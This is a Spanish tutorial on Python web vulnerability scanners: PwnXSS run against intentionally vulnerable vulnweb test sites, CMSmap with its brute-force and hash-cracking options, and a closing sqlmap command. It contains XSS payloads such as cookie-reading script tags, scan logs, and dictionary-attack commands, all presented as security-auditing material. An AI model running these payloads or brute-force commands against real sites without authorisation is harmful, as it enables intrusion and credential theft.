Dentro del ecosistema de python disponemos de diferentes herramientas desarrolladas que tienen como objetivo analizar un sitio web en búsqueda de vulnerabilidades.

Además de las que vamos a evaluar, OWASP mantiene una de las mejores listas de escáneres de vulnerabilidades. Estos escáneres de vulnerabilidades tienen la capacidad de automatizar la auditoría de seguridad y el escaneo de su red y sitios web en busca de diferentes riesgos de seguridad siguientes Mejores prácticas de OWASP.

• OWASP escáner vulnerabilidades

PwnXSS se trata de un script desarrollado para python 3.7 que tiene como dependencias principales BeautifulSoup y requests.

La herramienta partir de un sitio web que le pasamos como parámetro y de forma automática va probando con diferentes payloads para determinado si un dominio es vulnerable a XSS

Principales características:

• Rastrear todos los enlaces en un sitio web.
• Manejo avanzado de errores.
• Soporte multiprocesamiento.

Ejecución:

$ python3 pwnxss.py --help

$ python3 pwnxss.py -u http://testphp.vulnweb.com

Al realizar pruebas sobre el dominio testphp.vulnweb.com vemos como ha detectado diferentes vulnerabilidades XSS al probar con un payload donde está inyecto un código javascript en uno de los parámetros de la consulta.

Analizar las vulnerabilidades XSS del sitio http://testhtml5.vulnweb.com/

Podríamos utilizar el script PwnXSS para automatizar el proceso de encontrar vulnerabilidades XSS

$ python3 pwnxss.py -u http://testhtml5.vulnweb.com
██████╗ ██╗    ██╗███╗   ██╗██╗  ██╗███████╗███████╗
██╔══██╗██║    ██║████╗  ██║╚██╗██╔╝██╔════╝██╔════╝
██████╔╝██║ █╗ ██║██╔██╗ ██║ ╚███╔╝ ███████╗███████╗ {v0.5 Final}
██╔═══╝ ██║███╗██║██║╚██╗██║ ██╔██╗ ╚════██║╚════██║ https://github.com/pwn0sec/PwnXSS
██║     ╚███╔███╔╝██║ ╚████║██╔╝ ██╗███████║███████║
╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚══════╝
<<<<<<< STARTING >>>>>>>

[00:44:24] [INFO] Starting PwnXSS...
***************
[00:44:24] [INFO] Checking connection to: http://testhtml5.vulnweb.com
[00:44:24] [INFO] Connection estabilished 200
[00:44:24] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:24] [INFO] Collecting form input key.....
[00:44:24] [INFO] Form key name: username value: <script>prompt(document.cookie)</script>
[00:44:24] [INFO] Form key name: password value: <script>prompt(document.cookie)</script>
[00:44:24] [INFO] Sending payload (POST) method...
[00:44:24] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:24] [CRITICAL] Post data: {'username': '<script>prompt(document.cookie)</script>', 'password': '<script>prompt(document.cookie)</script>'}
***************
[00:44:24] [INFO] Checking connection to: http://testhtml5.vulnweb.com#myModal
[00:44:24] [INFO] Connection estabilished 200
[00:44:24] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:24] [INFO] Collecting form input key.....
[00:44:24] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:24] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:24] [INFO] Sending payload (POST) method...
[00:44:24] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:24] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:25] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/popular
[00:44:25] [INFO] Connection estabilished 200
[00:44:25] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:25] [INFO] Collecting form input key.....
[00:44:25] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:25] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:25] [INFO] Sending payload (POST) method...
[00:44:25] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:25] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:25] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/latest
[00:44:25] [INFO] Connection estabilished 200
[00:44:25] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:25] [INFO] Collecting form input key.....
[00:44:25] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:25] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:25] [INFO] Sending payload (POST) method...
[00:44:25] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:25] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:25] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/carousel
[00:44:26] [INFO] Connection estabilished 200
[00:44:26] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:26] [INFO] Collecting form input key.....
[00:44:26] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:26] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:26] [INFO] Sending payload (POST) method...
[00:44:26] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:26] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:26] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/archive
[00:44:26] [INFO] Connection estabilished 200
[00:44:26] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:26] [INFO] Collecting form input key.....
[00:44:26] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:26] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:26] [INFO] Sending payload (POST) method...
[00:44:26] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:26] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:26] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/about
[00:44:27] [INFO] Connection estabilished 200
[00:44:27] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:27] [INFO] Collecting form input key.....
[00:44:27] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Sending payload (POST) method...
[00:44:27] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:27] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:27] [INFO] Checking connection to: http://testhtml5.vulnweb.com#/contact
[00:44:27] [INFO] Connection estabilished 200
[00:44:27] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:27] [INFO] Collecting form input key.....
[00:44:27] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Sending payload (POST) method...
[00:44:27] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:27] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}
***************
[00:44:27] [INFO] Checking connection to: http://testhtml5.vulnweb.com
[00:44:27] [INFO] Connection estabilished 200
[00:44:27] [WARNING] Target have form with POST method: http://testhtml5.vulnweb.com/login
[00:44:27] [INFO] Collecting form input key.....
[00:44:27] [INFO] Form key name: username value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Form key name: password value: <script>prompt(5000/200)</script>
[00:44:27] [INFO] Sending payload (POST) method...
[00:44:28] [CRITICAL] Detected XSS (POST) at http://testhtml5.vulnweb.com/
[00:44:28] [CRITICAL] Post data: {'username': '<script>prompt(5000/200)</script>', 'password': '<script>prompt(5000/200)</script>'}

CMSmap es una herramienta open source escrita en Python diseñada especialmente para buscar posibles vulnerabilidades en todo tipo de portales que utilicen los CMS más utilizados como Joomla, Drupal o WordPress. De forma automática, esta herramienta detectará la plataforma que está siendo utilizada y lanzará una serie de test para comprobar la seguridad de la misma y notificar al administrador en caso de detectar posibles vulnerabilidades en diferentes componentes como plugins, usuarios y contraseñas por defecto.

Esta herramienta es muy fácil de usar y con algunos conocimientos en seguridad podemos auditar un sitio web que esté usando alguno de los CMS soportados. La instalación es muy simple, clonando el repositorio oficial:

$ git clone https://github.com/Dionach/CMSmap.git

CMSmap trabaja escaneando el CMS y sus módulos o plugins en busca de vulnerabilidades, para ello se vale de la base de datos disponible en exploit-db.com. Para ver todas las opciones de la herramienta lo hacemos con la opción -h o --help.

$ python3 cmsmap.py -h

    usage: cmsmap.py [-f W/J/D/M] [-F] [-t] [-a] [-H] [-i] [-o] [-E] [-c] [-s]
                        [-d] [-u] [-p] [-x] [-k] [-w] [-v] [-h] [-D] [-U]
                        [target]  	

CMSmap tool v1.0 - Simple CMS Scanner
    Author: Mike Manzotti  	

Scan:
    target                target URL (e.g. 'https://example.com:8080/')
    -f W/J/D/M, --force W/J/D/M
                        force scan (W)ordpress, (J)oomla or (D)rupal or (M)oodle
    -F, --fullscan        full scan using large plugin lists. False positives and slow!
    -t , --threads        number of threads (Default 5)
    -a , --agent          set custom user-agent
    -H , --header         add custom header (e.g. 'Authorization: Basic ABCD...')
    -i , --input          scan multiple targets listed in a given file
    -o , --output         save output in a file
    -E, --noedb           enumerate plugins without searching exploits
    -c, --nocleanurls     disable clean urls for Drupal only
    -s, --nosslcheck      don't validate the server's certificate
    -d, --dictattack      run low intense dictionary attack during scanning (5 attempts per user)  	

Brute-Force:
    -u , --usr            username or username file
    -p , --psw            password or password file
    -x, --noxmlrpc        brute forcing WordPress without XML-RPC  	

Post Exploitation:
    -k , --crack          password hashes file (Require hashcat installed. For WordPress and Joomla only)
    -w , --wordlist       wordlist file  	

Others:
    -v, --verbose         verbose mode (Default false)
    -h, --help            show this help message and exit
    -D, --default         run CMSmap with default options
    -U , --update         use (C)MSmap, (P)lugins or (PC) for both 		    

Ejemplos de ejecución con python 3:

$ python3 cmsmap.py https://example.com
$ python3 cmsmap.py https://example.com -f W -F --noedb -d
$ python3 cmsmap.py https://example.com -i targets.txt -o output.txt
$ python3 cmsmap.py https://example.com -u admin -p passwords.txt
$ python3 cmsmap.py -k hashes.txt -w passwords.txt 

La ejecución con python3 se puede realizar pasando como parámetro el sitio a escanear junto con el tipo de escaneo(-F corresponde a escaneo completo o full scan).

$ python3 cmsmap.py -F <sitio_web>  

En la siguiente ejecución se observa que verifica, cual es el CMS realizando un banner grabing y vulnerabilidades detectadas en algunos de los plugins que está utilizando el sitio.

$ python3 cmsmap.py -F http://www.wordpress.com  	

[I] Threads: 5
[-] Target: http://www.wordpress.com (192.0.78.12)
[M] Website Not in HTTPS: http://www.wordpress.com
[I] Server: nginx
[L] X-Frame-Options: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://www.wordpress.com/robots.txt
[I] CMS Detection: WordPress
[I] Wordpress Theme: h4
[M]  EDB-ID: 11458 "WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection"
[M]  EDB-ID: 39536 "WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities" 

Posteriormente,lo que hace es detectar ficheros wordpress por defecto y buscar determinados directorios:

[-] Default WordPress Files:
[I] http://www.wordpress.com/wp-content/themes/twentyten/license.txt
[I] http://www.wordpress.com/wp-content/themes/twentyten/readme.txt
[I] http://www.wordpress.com/wp-includes/ID3/license.commercial.txt
[I] http://www.wordpress.com/wp-includes/ID3/license.txt
[I] http://www.wordpress.com/wp-includes/ID3/readme.txt
[I] http://www.wordpress.com/wp-includes/images/crystal/license.txt
[I] http://www.wordpress.com/wp-includes/js/plupload/license.txt
[I] http://www.wordpress.com/wp-includes/js/tinymce/license.txt
[-] Checking interesting directories/files ... 
[L] http://www.wordpress.com/help.txt               
[L] http://www.wordpress.com/menu.txt

Vemos que, además de los usuarios, archivos por defecto, busca también plugins y directorios interesantes.

Por otro lado, teniendo el usuario, podemos intentar ataques por diccionario o fuerza bruta, ofreciendo la posibilidad de realizar un ataque por diccionario, seleccionando nosotros el que fichero que queramos de usuarios y passwords.

Para ello vemos que podemos usar las opciones de fuerza bruta:

Brute-Force:
    -u , --usr            username or username file
    -p , --psw            password or password file
    -x, --noxmlrpc        brute forcing WordPress without XML-RPC </div></div></div>  

Por defecto, un escaneo convencional de CMSmap crea 5 hilos o threads desde los que analiza el sistema seleccionado. Este número se puede limitar para evitar que durante el escaneo puedan ocurrir ataques DoS. El número de hilos también podría ser mayor, lo cual aumenta el riesgo de producir una denegación de servicio, a cambio se reduce el tiempo de escaneo.

Lo más importante primero es detectar aquella página y parámetro de consulta que pueda ser vulnerable,para ello hay que analizar el sitio en búsqueda de formularios de login o de búsqueda con el que interactuar.

Una vez identificado este script podríamos ejecutar el siguiente comando para obtener las bases de datos:

sqlmap -u <sitio> --dbs